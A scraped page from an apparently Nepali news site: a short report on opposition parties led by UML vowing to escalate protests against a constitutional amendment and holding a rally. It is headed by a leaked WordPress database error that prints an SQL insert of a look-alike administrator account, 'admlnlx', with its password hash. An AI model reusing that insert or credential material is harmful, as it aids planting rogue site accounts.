WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS8gOEFprKeWeoV0ZxfMxffosd/0Kw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 13:43:51', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ४-
एमालेलगायतका विपक्षी दलहरुले संविधान संशोधनविरुद्ध सडक र संसद् दुवैमा आन्दोलन चर्काउने भएका छन्।
एमाले संसदीय दलको कार्यलयमा सोमबार बिहान बसेको एमालेसहितका आठ दलहरुको बैठकले सडक र सदन दुवैमा आन्दोलन चर्काउने निर्णय गरेको हो । संविधान संशोधन फिर्ता नलिएसम्म अब आन्दोलन नरोक्ने निर्णय भएको जानकारी एमाले संसदीय दलका उपनेता सुवास नेम्वाङले बताए।
एमालेलगायतका विपक्षी दलहरुले संविधान संशोधन फिर्ता लिनका लागि संगठित दबाब दिन र यसबारेमा जनसमुदायलाई सन्देश दिन पुस १७ गते खुलामञ्चमा विशाल आमसभा गर्ने निर्णय गरेका छन् । बैठकले संविधान संशोधन फिर्ता लिएर चुनावको घोषणा गर्नुपर्ने निर्णय पनि गरेको छ । संशोधनका नाममा संविधानलाई असफल बनाउने खेल भइरहेको निश्कर्ष बैठकले निकालेको छ ।